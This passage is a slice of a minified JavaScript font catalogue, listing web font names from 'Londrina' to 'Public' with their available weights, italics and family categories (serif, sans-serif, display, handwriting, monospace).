Two",v:[400,"400i",700,"700i"],f:"display"},{n:"Londrina Outline",v:[400],f:"display"},{n:"Londrina Shadow",v:[400],f:"display"},{n:"Londrina Sketch",v:[400],f:"display"},{n:"Londrina Solid",v:["100","300",400,900],f:"display"},{n:"Long Cang",v:[400],f:"handwriting"},{n:"Lora",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Love Light",v:[400],f:"handwriting"},{n:"Love Ya Like A Sister",v:[400],f:"display"},{n:"Loved by the King",v:[400],f:"handwriting"},{n:"Lovers Quarrel",v:[400],f:"handwriting"},{n:"Luckiest Guy",v:[400],f:"display"},{n:"Lusitana",v:[400,700],f:"serif"},{n:"Lustria",v:[400],f:"serif"},{n:"Luxurious Roman",v:[400],f:"display"},{n:"Luxurious Script",v:[400],f:"handwriting"},{n:"Labrada",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"M PLUS 1",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"M PLUS 1 Code",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"M PLUS 1p",v:["100","300",400,500,700,800,900],f:"sans-serif"},{n:"M PLUS 2",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"M PLUS Code Latin",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"M PLUS Rounded 1c",v:["100","300",400,500,700,800,900],f:"sans-serif"},{n:"Ma Shan Zheng",v:[400],f:"handwriting"},{n:"Macondo",v:[400],f:"display"},{n:"Macondo Swash Caps",v:[400],f:"display"},{n:"Mada",v:["200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Magra",v:[400,700],f:"sans-serif"},{n:"Maiden Orange",v:[400],f:"display"},{n:"Maitree",v:["200","300",400,500,600,700],f:"serif"},{n:"Major Mono Display",v:[400],f:"monospace"},{n:"Mako",v:[400],f:"sans-serif"},{n:"Mali",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"handwriting"},{n:"Mallanna",v:[400],f:"sans-serif"},{n:"Mandali",v:[400],f:"sans-serif"},{n:"Manjari",v:["100",400,700],f:"sans-serif"},{n:"Manrope",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Mansalva",v:[400],f:"handwriting"},{n:"Manuale",v:["300",400,500,600,700,800,"300i","400i","500i","600i","700i","800i"],f:"serif"},{n:"Marcellus",v:[400],f:"serif"},{n:"Marcellus SC",v:[400],f:"serif"},{n:"Marck Script",v:[400],f:"handwriting"},{n:"Margarine",v:[400],f:"display"},{n:"Markazi Text",v:[400,500,600,700],f:"serif"},{n:"Marko One",v:[400],f:"serif"},{n:"Marmelad",v:[400],f:"sans-serif"},{n:"Martel",v:["200","300",400,600,700,800,900],f:"serif"},{n:"Martel Sans",v:["200","300",400,600,700,800,900],f:"sans-serif"},{n:"Marvel",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Mate",v:[400,"400i"],f:"serif"},{n:"Mate SC",v:[400],f:"serif"},{n:"Maven Pro",v:[400,500,600,700,800,900],f:"sans-serif"},{n:"McLaren",v:[400],f:"display"},{n:"Mea Culpa",v:[400],f:"handwriting"},{n:"Meddon",v:[400],f:"handwriting"},{n:"MedievalSharp",v:[400],f:"display"},{n:"Medula One",v:[400],f:"display"},{n:"Meera Inimai",v:[400],f:"sans-serif"},{n:"Megrim",v:[400],f:"display"},{n:"Meie Script",v:[400],f:"handwriting"},{n:"Meow Script",v:[400],f:"handwriting"},{n:"Merienda",v:[300,400,500,600,700,800,900],f:"handwriting"},{n:"Merriweather",v:["300","300i",400,"400i",700,"700i",900,"900i"],f:"serif"},{n:"Merriweather Sans",v:["300",400,500,600,700,800,"300i","400i","500i","600i","700i","800i"],f:"sans-serif"},{n:"Metal",v:[400],f:"display"},{n:"Metal Mania",v:[400],f:"display"},{n:"Metamorphous",v:[400],f:"display"},{n:"Metrophobic",v:[400],f:"sans-serif"},{n:"Michroma",v:[400],f:"sans-serif"},{n:"Milonga",v:[400],f:"display"},{n:"Miltonian",v:[400],f:"display"},{n:"Miltonian Tattoo",v:[400],f:"display"},{n:"Mina",v:[400,700],f:"sans-serif"},{n:"Miniver",v:[400],f:"display"},{n:"Miriam Libre",v:[400,700],f:"sans-serif"},{n:"Mirza",v:[400,500,600,700],f:"display"},{n:"Miss Fajardose",v:[400],f:"handwriting"},{n:"Mitr",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Mochiy Pop One",v:[400],f:"sans-serif"},{n:"Mochiy Pop P One",v:[400],f:"sans-serif"},{n:"Modak",v:[400],f:"display"},{n:"Modern Antiqua",v:[400],f:"display"},{n:"Mogra",v:[400],f:"display"},{n:"Mohave",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Molengo",v:[400],f:"sans-serif"},{n:"Molle",v:["400i"],f:"handwriting"},{n:"Monda",v:[400,700],f:"sans-serif"},{n:"Monofett",v:[400],f:"monospace"},{n:"Monoton",v:[400],f:"display"},{n:"Monsieur La Doulaise",v:[400],f:"handwriting"},{n:"Montaga",v:[400],f:"serif"},{n:"Montagu Slab",v:["100","200","300",400,500,600,700],f:"serif"},{n:"MonteCarlo",v:[400],f:"handwriting"},{n:"Montez",v:[400],f:"handwriting"},{n:"Montserrat",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Montserrat Alternates",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Montserrat Subrayada",v:[400,700],f:"sans-serif"},{n:"Moo Lah Lah",v:[400],f:"display"},{n:"Moon Dance",v:[400],f:"handwriting"},{n:"Moul",v:[400],f:"display"},{n:"Moulpali",v:[400],f:"display"},{n:"Mountains of Christmas",v:[400,700],f:"display"},{n:"Mouse Memoirs",v:[400],f:"sans-serif"},{n:"Mr Bedfort",v:[400],f:"handwriting"},{n:"Mr Dafoe",v:[400],f:"handwriting"},{n:"Mr De Haviland",v:[400],f:"handwriting"},{n:"Mrs Saint Delafield",v:[400],f:"handwriting"},{n:"Mrs Sheppards",v:[400],f:"handwriting"},{n:"Ms Madi",v:[400],f:"handwriting"},{n:"Mukta",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Mukta Mahee",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Mukta Malar",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Mukta Vaani",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Mulish",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Murecho",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"MuseoModerno",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"display"},{n:"My Soul",v:[400],f:"handwriting"},{n:"Mystery Quest",v:[400],f:"display"},{n:"Marhey",v:[300,400,500,600,700],f:"display"},{n:"Martian Mono",v:[100,200,300,400,500,600,700,800],f:"monospace"},{n:"Material Icons",v:[400],f:"monospace"},{n:"Material Icons Outlined",v:[400],f:"monospace"},{n:"Material Icons Round",v:[400],f:"monospace"},{n:"Material Icons Sharp",v:[400],f:"monospace"},{n:"Material Icons Two Tone",v:[400],f:"monospace"},{n:"Material Symbols Outlined",v:[100,200,300,400,500,600,700],f:"monospace"},{n:"Material Symbols Rounded",v:[100,200,300,400,500,600,700],f:"monospace"},{n:"Material Symbols Sharp",v:[100,200,300,400,500,600,700],f:"monospace"},{n:"Mingzat",v:[400],f:"sans-serif"},{n:"Monomaniac One",v:[400],f:"sans-serif"},{n:"Mynerve",v:[400],f:"handwriting"},{n:"NTR",v:[400],f:"sans-serif"},{n:"Nanum Brush Script",v:[400],f:"handwriting"},{n:"Nanum Gothic",v:[400,700,800],f:"sans-serif"},{n:"Nanum Gothic Coding",v:[400,700],f:"monospace"},{n:"Nanum Myeongjo",v:[400,700,800],f:"serif"},{n:"Nanum Pen Script",v:[400],f:"handwriting"},{n:"Neonderthaw",v:[400],f:"handwriting"},{n:"Nerko One",v:[400],f:"handwriting"},{n:"Neucha",v:[400],f:"handwriting"},{n:"Neuton",v:["200","300",400,"400i",700,800],f:"serif"},{n:"New Rocker",v:[400],f:"display"},{n:"New Tegomin",v:[400],f:"serif"},{n:"News Cycle",v:[400,700],f:"sans-serif"},{n:"Newsreader",v:["200","300",400,500,600,700,800,"200i","300i","400i","500i","600i","700i","800i"],f:"serif"},{n:"Niconne",v:[400],f:"handwriting"},{n:"Niramit",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Nixie One",v:[400],f:"display"},{n:"Nobile",v:[400,"400i",500,"500i",700,"700i"],f:"sans-serif"},{n:"Nokora",v:["100","300",400,700,900],f:"sans-serif"},{n:"Norican",v:[400],f:"handwriting"},{n:"Nosifer",v:[400],f:"display"},{n:"Notable",v:[400],f:"sans-serif"},{n:"Nothing You Could Do",v:[400],f:"handwriting"},{n:"Noticia Text",v:[400,"400i",700,"700i"],f:"serif"},{n:"Noto Emoji",v:["300",400,500,600,700],f:"sans-serif"},{n:"Noto Kufi Arabic",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Music",v:[400],f:"sans-serif"},{n:"Noto Naskh Arabic",v:[400,500,600,700],f:"serif"},{n:"Noto Nastaliq Urdu",v:[400,500,600,700],f:"serif"},{n:"Noto Rashi Hebrew",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Sans",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Noto Sans Adlam",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Adlam Unjoined",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Anatolian Hieroglyphs",v:[400],f:"sans-serif"},{n:"Noto Sans Arabic",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Armenian",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Avestan",v:[400],f:"sans-serif"},{n:"Noto Sans Balinese",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Bamum",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Bassa Vah",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Batak",v:[400],f:"sans-serif"},{n:"Noto Sans Bengali",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Bhaiksuki",v:[400],f:"sans-serif"},{n:"Noto Sans Brahmi",v:[400],f:"sans-serif"},{n:"Noto Sans Buginese",v:[400],f:"sans-serif"},{n:"Noto Sans Buhid",v:[400],f:"sans-serif"},{n:"Noto Sans Canadian Aboriginal",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Carian",v:[400],f:"sans-serif"},{n:"Noto Sans Caucasian Albanian",v:[400],f:"sans-serif"},{n:"Noto Sans Chakma",v:[400],f:"sans-serif"},{n:"Noto Sans Cham",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Cherokee",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Coptic",v:[400],f:"sans-serif"},{n:"Noto Sans Cuneiform",v:[400],f:"sans-serif"},{n:"Noto Sans Cypriot",v:[400],f:"sans-serif"},{n:"Noto Sans Deseret",v:[400],f:"sans-serif"},{n:"Noto Sans Devanagari",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Display",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Noto Sans Duployan",v:[400],f:"sans-serif"},{n:"Noto Sans Egyptian Hieroglyphs",v:[400],f:"sans-serif"},{n:"Noto Sans Elbasan",v:[400],f:"sans-serif"},{n:"Noto Sans Elymaic",v:[400],f:"sans-serif"},{n:"Noto Sans Georgian",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Glagolitic",v:[400],f:"sans-serif"},{n:"Noto Sans Gothic",v:[400],f:"sans-serif"},{n:"Noto Sans Grantha",v:[400],f:"sans-serif"},{n:"Noto Sans Gujarati",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Gunjala Gondi",v:[400],f:"sans-serif"},{n:"Noto Sans Gurmukhi",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans HK",v:["100","300",400,500,700,900],f:"sans-serif"},{n:"Noto Sans Hanifi Rohingya",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Hanunoo",v:[400],f:"sans-serif"},{n:"Noto Sans Hatran",v:[400],f:"sans-serif"},{n:"Noto Sans Hebrew",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Imperial Aramaic",v:[400],f:"sans-serif"},{n:"Noto Sans Indic Siyaq Numbers",v:[400],f:"sans-serif"},{n:"Noto Sans Inscriptional Pahlavi",v:[400],f:"sans-serif"},{n:"Noto Sans Inscriptional Parthian",v:[400],f:"sans-serif"},{n:"Noto Sans JP",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Javanese",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans KR",v:["100","300",400,500,700,900],f:"sans-serif"},{n:"Noto Sans Kaithi",v:[400],f:"sans-serif"},{n:"Noto Sans Kannada",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Kayah Li",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Kharoshthi",v:[400],f:"sans-serif"},{n:"Noto Sans Khmer",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Khojki",v:[400],f:"sans-serif"},{n:"Noto Sans Khudawadi",v:[400],f:"sans-serif"},{n:"Noto Sans Lao",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Lepcha",v:[400],f:"sans-serif"},{n:"Noto Sans Limbu",v:[400],f:"sans-serif"},{n:"Noto Sans Linear A",v:[400],f:"sans-serif"},{n:"Noto Sans Linear B",v:[400],f:"sans-serif"},{n:"Noto Sans Lisu",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Lycian",v:[400],f:"sans-serif"},{n:"Noto Sans Lydian",v:[400],f:"sans-serif"},{n:"Noto Sans Mahajani",v:[400],f:"sans-serif"},{n:"Noto Sans Malayalam",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Mandaic",v:[400],f:"sans-serif"},{n:"Noto Sans Manichaean",v:[400],f:"sans-serif"},{n:"Noto Sans Marchen",v:[400],f:"sans-serif"},{n:"Noto Sans Masaram Gondi",v:[400],f:"sans-serif"},{n:"Noto Sans Math",v:[400],f:"sans-serif"},{n:"Noto Sans Mayan Numerals",v:[400],f:"sans-serif"},{n:"Noto Sans Medefaidrin",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Meetei Mayek",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Meroitic",v:[400],f:"sans-serif"},{n:"Noto Sans Miao",v:[400],f:"sans-serif"},{n:"Noto Sans Modi",v:[400],f:"sans-serif"},{n:"Noto Sans Mongolian",v:[400],f:"sans-serif"},{n:"Noto Sans Mono",v:["100","200","300",400,500,600,700,800,900],f:"monospace"},{n:"Noto Sans Mro",v:[400],f:"sans-serif"},{n:"Noto Sans Multani",v:[400],f:"sans-serif"},{n:"Noto Sans Myanmar",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans NKo",v:[400],f:"sans-serif"},{n:"Noto Sans Nabataean",v:[400],f:"sans-serif"},{n:"Noto Sans New Tai Lue",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Newa",v:[400],f:"sans-serif"},{n:"Noto Sans Nushu",v:[400],f:"sans-serif"},{n:"Noto Sans Ogham",v:[400],f:"sans-serif"},{n:"Noto Sans Ol Chiki",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Old Hungarian",v:[400],f:"sans-serif"},{n:"Noto Sans Old Italic",v:[400],f:"sans-serif"},{n:"Noto Sans Old North Arabian",v:[400],f:"sans-serif"},{n:"Noto Sans Old Permic",v:[400],f:"sans-serif"},{n:"Noto Sans Old Persian",v:[400],f:"sans-serif"},{n:"Noto Sans Old Sogdian",v:[400],f:"sans-serif"},{n:"Noto Sans Old South Arabian",v:[400],f:"sans-serif"},{n:"Noto Sans Old Turkic",v:[400],f:"sans-serif"},{n:"Noto Sans Oriya",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Osage",v:[400],f:"sans-serif"},{n:"Noto Sans Osmanya",v:[400],f:"sans-serif"},{n:"Noto Sans Pahawh Hmong",v:[400],f:"sans-serif"},{n:"Noto Sans Palmyrene",v:[400],f:"sans-serif"},{n:"Noto Sans Pau Cin Hau",v:[400],f:"sans-serif"},{n:"Noto Sans Phags Pa",v:[400],f:"sans-serif"},{n:"Noto Sans Phoenician",v:[400],f:"sans-serif"},{n:"Noto Sans Psalter Pahlavi",v:[400],f:"sans-serif"},{n:"Noto Sans Rejang",v:[400],f:"sans-serif"},{n:"Noto Sans Runic",v:[400],f:"sans-serif"},{n:"Noto Sans SC",v:["100","300",400,500,700,900],f:"sans-serif"},{n:"Noto Sans Samaritan",v:[400],f:"sans-serif"},{n:"Noto Sans Saurashtra",v:[400],f:"sans-serif"},{n:"Noto Sans Sharada",v:[400],f:"sans-serif"},{n:"Noto Sans Shavian",v:[400],f:"sans-serif"},{n:"Noto Sans Siddham",v:[400],f:"sans-serif"},{n:"Noto Sans Sinhala",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Sogdian",v:[400],f:"sans-serif"},{n:"Noto Sans Sora Sompeng",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Soyombo",v:[400],f:"sans-serif"},{n:"Noto Sans Sundanese",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Syloti Nagri",v:[400],f:"sans-serif"},{n:"Noto Sans Symbols",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Symbols 2",v:[400],f:"sans-serif"},{n:"Noto Sans Syriac",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans TC",v:["100","300",400,500,700,900],f:"sans-serif"},{n:"Noto Sans Tagalog",v:[400],f:"sans-serif"},{n:"Noto Sans Tagbanwa",v:[400],f:"sans-serif"},{n:"Noto Sans Tai Le",v:[400],f:"sans-serif"},{n:"Noto Sans Tai Tham",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Tai Viet",v:[400],f:"sans-serif"},{n:"Noto Sans Takri",v:[400],f:"sans-serif"},{n:"Noto Sans Tamil",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Tamil Supplement",v:[400],f:"sans-serif"},{n:"Noto Sans Telugu",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Thaana",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Thai",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Thai Looped",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Tifinagh",v:[400],f:"sans-serif"},{n:"Noto Sans Tirhuta",v:[400],f:"sans-serif"},{n:"Noto Sans Ugaritic",v:[400],f:"sans-serif"},{n:"Noto Sans Vai",v:[400],f:"sans-serif"},{n:"Noto Sans Wancho",v:[400],f:"sans-serif"},{n:"Noto Sans Warang Citi",v:[400],f:"sans-serif"},{n:"Noto Sans Yi",v:[400],f:"sans-serif"},{n:"Noto Sans Zanabazar Square",v:[400],f:"sans-serif"},{n:"Noto Serif",v:[400,"400i",700,"700i"],f:"serif"},{n:"Noto Serif Ahom",v:[400],f:"serif"},{n:"Noto Serif Armenian",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Balinese",v:[400],f:"serif"},{n:"Noto Serif Bengali",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Devanagari",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Display",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Noto Serif Dogra",v:[400],f:"serif"},{n:"Noto Serif Ethiopic",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Georgian",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Grantha",v:[400],f:"serif"},{n:"Noto Serif Gujarati",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Gurmukhi",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Hebrew",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif JP",v:["200","300",400,500,600,700,900],f:"serif"},{n:"Noto Serif KR",v:["200","300",400,500,600,700,900],f:"serif"},{n:"Noto Serif Kannada",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Khmer",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Lao",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Malayalam",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Myanmar",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Nyiakeng Puachue Hmong",v:[400,500,600,700],f:"serif"},{n:"Noto Serif SC",v:["200","300",400,500,600,700,900],f:"serif"},{n:"Noto Serif Sinhala",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif TC",v:["200","300",400,500,600,700,900],f:"serif"},{n:"Noto Serif Tamil",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Noto Serif Tangut",v:[400],f:"serif"},{n:"Noto Serif Telugu",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Thai",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Tibetan",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Yezidi",v:[400,500,600,700],f:"serif"},{n:"Noto Traditional Nushu",v:[300,400,500,600,700],f:"sans-serif"},{n:"Nova Cut",v:[400],f:"display"},{n:"Nova Flat",v:[400],f:"display"},{n:"Nova Mono",v:[400],f:"monospace"},{n:"Nova Oval",v:[400],f:"display"},{n:"Nova Round",v:[400],f:"display"},{n:"Nova Script",v:[400],f:"display"},{n:"Nova Slim",v:[400],f:"display"},{n:"Nova Square",v:[400],f:"display"},{n:"Numans",v:[400],f:"sans-serif"},{n:"Nunito",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Nunito Sans",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Nabla",v:[400],f:"display"},{n:"Noto Color Emoji",v:[400],f:"sans-serif"},{n:"Noto Sans Chorasmian",v:[400],f:"sans-serif"},{n:"Noto Sans Ethiopic",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Lao Looped",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Mende Kikakui",v:[400],f:"sans-serif"},{n:"Noto Sans Nag Mundari",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Nandinagari",v:[400],f:"sans-serif"},{n:"Noto Sans SignWriting",v:[400],f:"sans-serif"},{n:"Noto Sans Tangsa",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Serif HK",v:[200,300,400,500,600,700,800,900],f:"serif"},{n:"Noto Serif NP Hmong",v:[400,500,600,700],f:"serif"},{n:"Noto Serif Oriya",v:[400,500,600,700],f:"serif"},{n:"Noto Serif Toto",v:[400,500,600,700],f:"serif"},{n:"Nuosu SIL",v:[400],f:"serif"},{n:"Odibee Sans",v:[400],f:"display"},{n:"Odor Mean Chey",v:[400],f:"serif"},{n:"Offside",v:[400],f:"display"},{n:"Oi",v:[400],f:"display"},{n:"Old Standard TT",v:[400,"400i",700],f:"serif"},{n:"Oldenburg",v:[400],f:"display"},{n:"Ole",v:[400],f:"handwriting"},{n:"Oleo Script",v:[400,700],f:"display"},{n:"Oleo Script Swash Caps",v:[400,700],f:"display"},{n:"Oooh Baby",v:[400],f:"handwriting"},{n:"Open Sans",v:["300",400,500,600,700,800,"300i","400i","500i","600i","700i","800i"],f:"sans-serif"},{n:"Oranienbaum",v:[400],f:"serif"},{n:"Orbitron",v:[400,500,600,700,800,900],f:"sans-serif"},{n:"Oregano",v:[400,"400i"],f:"display"},{n:"Orelega One",v:[400],f:"display"},{n:"Orienta",v:[400],f:"sans-serif"},{n:"Original Surfer",v:[400],f:"display"},{n:"Oswald",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Outfit",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Over the Rainbow",v:[400],f:"handwriting"},{n:"Overlock",v:[400,"400i",700,"700i",900,"900i"],f:"display"},{n:"Overlock SC",v:[400],f:"display"},{n:"Overpass",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Overpass Mono",v:["300",400,500,600,700],f:"monospace"},{n:"Ovo",v:[400],f:"serif"},{n:"Oxanium",v:["200","300",400,500,600,700,800],f:"display"},{n:"Oxygen",v:["300",400,700],f:"sans-serif"},{n:"Oxygen Mono",v:[400],f:"monospace"},{n:"PT Mono",v:[400],f:"monospace"},{n:"PT Sans",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"PT Sans Caption",v:[400,700],f:"sans-serif"},{n:"PT Sans Narrow",v:[400,700],f:"sans-serif"},{n:"PT Serif",v:[400,"400i",700,"700i"],f:"serif"},{n:"PT Serif Caption",v:[400,"400i"],f:"serif"},{n:"Pacifico",v:[400],f:"handwriting"},{n:"Padauk",v:[400,700],f:"sans-serif"},{n:"Palanquin",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"Palanquin Dark",v:[400,500,600,700],f:"sans-serif"},{n:"Pangolin",v:[400],f:"handwriting"},{n:"Paprika",v:[400],f:"display"},{n:"Parisienne",v:[400],f:"handwriting"},{n:"Passero One",v:[400],f:"display"},{n:"Passion One",v:[400,700,900],f:"display"},{n:"Passions Conflict",v:[400],f:"handwriting"},{n:"Pathway Gothic One",v:[400],f:"sans-serif"},{n:"Patrick Hand",v:[400],f:"handwriting"},{n:"Patrick Hand SC",v:[400],f:"handwriting"},{n:"Pattaya",v:[400],f:"sans-serif"},{n:"Patua One",v:[400],f:"display"},{n:"Pavanam",v:[400],f:"sans-serif"},{n:"Paytone One",v:[400],f:"sans-serif"},{n:"Peddana",v:[400],f:"serif"},{n:"Peralta",v:[400],f:"display"},{n:"Permanent Marker",v:[400],f:"handwriting"},{n:"Petemoss",v:[400],f:"handwriting"},{n:"Petit Formal Script",v:[400],f:"handwriting"},{n:"Petrona",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Philosopher",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Piazzolla",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Piedra",v:[400],f:"display"},{n:"Pinyon Script",v:[400],f:"handwriting"},{n:"Pirata One",v:[400],f:"display"},{n:"Plaster",v:[400],f:"display"},{n:"Play",v:[400,700],f:"sans-serif"},{n:"Playball",v:[400],f:"display"},{n:"Playfair Display",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Playfair Display SC",v:[400,"400i",700,"700i",900,"900i"],f:"serif"},{n:"Plus Jakarta Sans",v:["200","300",400,500,600,700,800,"200i","300i","400i","500i","600i","700i","800i"],f:"sans-serif"},{n:"Podkova",v:[400,500,600,700,800],f:"serif"},{n:"Poiret One",v:[400],f:"display"},{n:"Poller One",v:[400],f:"display"},{n:"Poly",v:[400,"400i"],f:"serif"},{n:"Pompiere",v:[400],f:"display"},{n:"Pontano Sans",v:[300,400,500,600,700],f:"sans-serif"},{n:"Poor Story",v:[400],f:"display"},{n:"Poppins",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Port Lligat Sans",v:[400],f:"sans-serif"},{n:"Port Lligat Slab",v:[400],f:"serif"},{n:"Potta One",v:[400],f:"display"},{n:"Pragati Narrow",v:[400,700],f:"sans-serif"},{n:"Praise",v:[400],f:"handwriting"},{n:"Prata",v:[400],f:"serif"},{n:"Preahvihear",v:[400],f:"sans-serif"},{n:"Press Start 2P",v:[400],f:"display"},{n:"Pridi",v:["200","300",400,500,600,700],f:"serif"},{n:"Princess Sofia",v:[400],f:"handwriting"},{n:"Prociono",v:[400],f:"serif"},{n:"Prompt",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Prosto One",v:[400],f:"display"},{n:"Proza Libre",v:[400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"sans-serif"},{n:"Public 